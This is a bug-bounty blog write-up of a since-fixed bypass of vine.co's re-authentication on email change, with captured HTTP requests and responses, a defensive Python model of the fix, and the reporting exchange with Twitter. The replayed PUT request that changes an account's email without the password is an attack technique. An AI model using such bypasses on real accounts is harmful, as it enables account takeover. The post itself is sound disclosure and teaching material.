Wednesday, September 21, 2016

Vine Re-Auth bypass [Twitter bug bounty]





Hi, today I will share an old bug that I found in 2014 at vine.co.


Introduction

I was exploring Twitter when I saw @0xSobky publish a tweet saying he had found an XSS on vine.co by changing the HTTP method. That took me back in time: I had been hunting bugs there for a while before they started their bug bounty with Twitter. I was too late, because an army of hackers was already looking there, so the good bugs had already been found. It is about thinking outside the box, finding new attacks and new ideas, and looking smarter than the others.

In 2014 I was 17 years old and really busy with my studies, so I didn't have time to do bug bounty all the time, but I took breaks to do some. I am familiar with the vine.co platform because I did some bug hunting there early on and found some bugs that I reported to Twitter when they weren't using the HackerOne platform yet. I got into the hall of fame.




The finding 



After I opened vine.co I started remembering the permissions, features and mechanisms. I did some XSS, CSRF and IDOR tests, but to no avail. It was time to think outside the box: I wanted to change the email to one that was already registered. I went to the account settings page, where there are a few things to work with.





Trying to change the email from abdullah.test1@gmail.com to abdullah.test12@gmail.com, just to check the mechanism.





When I clicked "Save" this form appeared!



When I was hunting bugs on vine.co before, this form wasn't there, so it is a new feature! And I remembered that I had suggested to the Twitter team that they add a Re-Auth step to the email change mechanism, so that CSRF and XSS wouldn't be enough to change the email, like the Medium XSS.

I tried to use this form to brute-force the password, but it allowed only 10 or 12 attempts, so it isn't vulnerable.

There was something that attracted me: the request looked like this:



POST /api/users/authenticate HTTP/1.1
Host: vine.co
User-Agent: Yours
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXX.239.XXX.15
vine-session-id: 1190983260029XXXX84-XXXXXX-XXX-XXXX-bf49-dfc5XXX22196c
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Content-Length: 53
Cookie: __utma=204412823.2104088898.1474326278.1474326278.1474385286.2; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=204412823.15.9.1474387114630; __utmc=204412823
Connection: close

action=change-email&username=abdullah.test1%40gmail.com&password=my-pAs*w0rd 

I noticed that the new email wasn't included in this request, which means it is submitted somewhere else. After a successful Re-Auth, this request is made:



PUT /api/users/1190983260029763584 HTTP/1.1
Host: vine.co
User-Agent: Yours
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXX.239.XXX.15
vine-session-id: 11909832600XX763584-XXXXX-XXXXX-XXXX-bf49-dfcXX422196c
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Content-Length: 33
Cookie: __utma=204412823.2104088898.1474326278.1474326278.1474385286.2; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=204412823.8.9.1474385736853; __utmc=204412823; __utmt=1
Connection: close

email=abdullah.test12%40gmail.com

The response was:


HTTP/1.1 200 OK
Cache-Control: private, no-store, must-revalidate
Content-Disposition: attachment; filename=unknown_file.json
Content-Type: application/json
Date: DATE HERE
Expires: 0
Pragma: no-cache
Strict-Transport-Security: max-age=631138519
Content-Length: 54
Connection: Close

{"code": "", "data": {}, "success": true, "error": ""}



I saved this request and tried to compare it to non-Re-Auth actions, like setting a new URL for the account:



PUT /api/users/1190983260029763584/vanity/hacker123 HTTP/1.1
Host: vine.co
User-Agent: Yours 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXX.241.XXX.183
vine-session-id: 11909832600297635XX-ac83eaab-XXXX-XXXX-bf49-dfc56422196c
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Cookie: __utma=204412823.2104088898.1474326278.1474386225.1474455441.4; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=204412823; __utmb=204412823.1.10.1474455441; __utmt=1
Connection: close
Content-Length: 0



There isn't any extra header or token of any kind that differs between the two HTTP requests. Now let's log out and try to make the change-email action using the old request.


I logged out, logged back into the account and made the request using the same endpoint /api/users/1190983260029763584.

First I made a request to change the URL:


PUT /api/users/1190983260029763584/vanity/hacker123 HTTP/1.1
Host: vine.co
User-Agent: Yours 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXX.241.XXX.183
vine-session-id: 11909832600297635XX-ac83eaab-XXXX-XXXX-bf49-dfc56422196c
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Cookie: __utma=204412823.2104088898.1474326278.1474386225.1474455441.4; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmc=204412823; __utmb=204412823.1.10.1474455441; __utmt=1
Connection: close
Content-Length: 0



I added Content-Type to the HTTP headers to make a PUT request with a body, changed the API endpoint to /api/users/1190983260029763584 and added the email parameter in the body. The new request looks like this:



PUT /api/users/1190983260029763584 HTTP/1.1
Host: vine.co
User-Agent: Yours 
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
x-vine-client: vinewww/2.1
x-vine-client-ip: XXx.239.xxx.15
vine-session-id: 1190983260029XXX3584-XXXXX-XXXXX-48ee-bf49-XXXXXXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: https://vine.co/settings
Content-Length: 33
Cookie: __utma=204412823.2104088898.1474326278.1474326278.1474385286.2; __utmz=204412823.1474326278.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmb=204412823.8.9.1474385736853; __utmc=204412823; __utmt=1
Connection: close

email=abdullah.hacker%40gmail.com

And I got this!!


HTTP/1.1 200 OK
Cache-Control: private, no-store, must-revalidate
Content-Disposition: attachment; filename=unknown_file.json
Content-Type: application/json
Date: date 
Expires: 0
Pragma: no-cache
Strict-Transport-Security: max-age=631138519
Content-Length: 54
Connection: Close

{"code": "", "data": {}, "success": true, "error": ""}

The request was accepted!! Without entering the username or password (Re-Auth).

Now I know this is not a really good bypass, because the attacker needs physical access to the user's account or has to get their cookies. But it is still a good bypass of this mechanism; they put it there for a reason, and I bypassed it. Now it was time to report to the Twitter team.
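The gap the two captured requests expose is that POST /api/users/authenticate and PUT /api/users/{id} share nothing but the session cookie, so the server has no way to tell whether the Re-Auth step ever happened. The model below is an added example written for this post, not Vine's or Twitter's code: the Session and User classes, the handler names, the 300-second proof lifetime and the 10-attempt lockout are assumptions, and the user id, addresses and password are the placeholder values from the requests above. It puts the handler as found next to a hardened one that requires a single-use, action-bound proof from the authenticate step.

```python
import hmac
import secrets
import time
from dataclasses import dataclass, field

REAUTH_TTL_SECONDS = 300     # assumed policy: a completed re-auth stays usable for 5 minutes
MAX_PASSWORD_ATTEMPTS = 10   # assumed lockout threshold, mirroring the "10 or 12 attempts" above
USER_ID = "1190983260029763584"   # the account id from the requests in the post

@dataclass
class User:
    email: str
    password: str            # constructed demo value; a real store keeps a salted hash

@dataclass
class Session:
    user_id: str
    failed_attempts: int = 0
    # action -> (token, expires_at). The vulnerable handler below never looks at this,
    # which is the gap the post describes: nothing ties the authenticate call to the PUT.
    reauth_proofs: dict = field(default_factory=dict)

def make_users():
    """Constructed user store using the address and password shown in the post."""
    return {USER_ID: User("abdullah.test1@gmail.com", "my-pAs*w0rd")}

def authenticate(users, session, action, username, password, now=None):
    """Models POST /api/users/authenticate: on success, issue a single-use proof bound to (session, action)."""
    now = time.time() if now is None else now
    if session.failed_attempts >= MAX_PASSWORD_ATTEMPTS:
        return None                                   # locked out: blunts online brute force
    user = users[session.user_id]
    if username != user.email or not hmac.compare_digest(password.encode(), user.password.encode()):
        session.failed_attempts += 1
        return None
    session.failed_attempts = 0
    token = secrets.token_urlsafe(32)
    session.reauth_proofs[action] = (token, now + REAUTH_TTL_SECONDS)
    return token

def update_email_vulnerable(users, session, new_email):
    """Models PUT /api/users/{id} as found: the session cookie alone is enough."""
    users[session.user_id].email = new_email
    return {"success": True, "error": ""}

def update_email_hardened(users, session, new_email, reauth_token, now=None):
    """Same endpoint with the missing check: a fresh, unexpired, single-use 'change-email' proof is required."""
    now = time.time() if now is None else now
    proof = session.reauth_proofs.pop("change-email", None)   # consumed on first use
    if proof is None or reauth_token is None:
        return {"success": False, "error": "reauth_required"}
    token, expires_at = proof
    if now > expires_at or not hmac.compare_digest(token, reauth_token):
        return {"success": False, "error": "reauth_required"}
    users[session.user_id].email = new_email
    return {"success": True, "error": ""}

def run_demo():
    """Exercise both handlers and return which requests were accepted."""
    results = {}
    # The post's observation: a PUT carrying only the session cookie is accepted.
    users, s = make_users(), Session(USER_ID)
    results["vulnerable_without_reauth"] = update_email_vulnerable(users, s, "abdullah.hacker@gmail.com")["success"]
    # Hardened handler, same request, no proof: refused.
    users, s = make_users(), Session(USER_ID)
    results["hardened_without_reauth"] = update_email_hardened(users, s, "abdullah.hacker@gmail.com", None)["success"]
    # Legitimate flow: re-authenticate for the action, then submit with the proof.
    token = authenticate(users, s, "change-email", "abdullah.test1@gmail.com", "my-pAs*w0rd", now=1000.0)
    results["hardened_with_reauth"] = update_email_hardened(users, s, "abdullah.test12@gmail.com", token, now=1010.0)["success"]
    # Replaying the same proof fails: it was consumed above.
    results["hardened_replay"] = update_email_hardened(users, s, "again@example.com", token, now=1020.0)["success"]
    # A proof older than REAUTH_TTL_SECONDS is refused too.
    token = authenticate(users, s, "change-email", "abdullah.test12@gmail.com", "my-pAs*w0rd", now=2000.0)
    results["hardened_expired"] = update_email_hardened(users, s, "late@example.com", token, now=2000.0 + REAUTH_TTL_SECONDS + 1)["success"]
    # Attempt limiting on the re-auth endpoint: after MAX_PASSWORD_ATTEMPTS failures the correct password is rejected too.
    for _ in range(MAX_PASSWORD_ATTEMPTS):
        authenticate(users, s, "change-email", "abdullah.test12@gmail.com", "wrong-guess")
    results["locked_out"] = authenticate(users, s, "change-email", "abdullah.test12@gmail.com", "my-pAs*w0rd") is None
    results["final_email"] = users[USER_ID].email
    return results

if __name__ == "__main__":
    for name, value in run_demo().items():
        print(f"{name}: {value}")
```

Running the file prints one line per scenario. The design choice worth noting is that the proof is stored server-side against the session and keyed by the action name, so a proof obtained for "change-email" cannot be spent on another sensitive action, cannot be replayed, and dies after the TTL; a stateless alternative would be an HMAC over (session id, action, expiry) verified by the update handler, which gives the same binding without the per-session dictionary.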

Here is a video for the PoC:






I wrote the report and sent it to them using the H1 platform.

I got this message the same day:




Okay, it is too good, let's wait for the bounty now. But this wasn't the end: I got this reply 2 days after my bug was triaged:




Wait a second.... What?!!?!?

This reply made me mad because it didn't even make sense. It was time to write a "RESPECTFUL" reply with more explanation or an objection to the decision, without using mean words like "taxi driver" or something like "You losers, nobody follows you on your account". In BB you should always respect the teams that you work with; they don't have any reason to drop your report. In some cases (it happened to me) they get the wrong idea about the report, sometimes because of their limited experience or your bad explanation, or browsers, addons... etc.


I wrote some points; here are some of them:

1. I reported a vulnerability in vine.co, so it is not the iOS platform; any weakness in the iOS app is not related to my report.
2. Is this a new security style: if you have a weakness in the mobile apps, that means you should have it on the website too?
3. You have a security feature in vine.co and I bypassed it. How should bug bounty be?



and a lot of explanation in one reply. The Twitter team were very professional and replied:





I got my bounty and Twitter fixed the bug yesterday (-1 Twitter team) and everyone is happy :)


Conclusion

Always believe in your skills and behave well with security teams. Plus, check the new features and the request endpoints.


That is all. If you like it or want to ask something, put a comment or follow me on Twitter @Abdulahhusam

Thanks for reading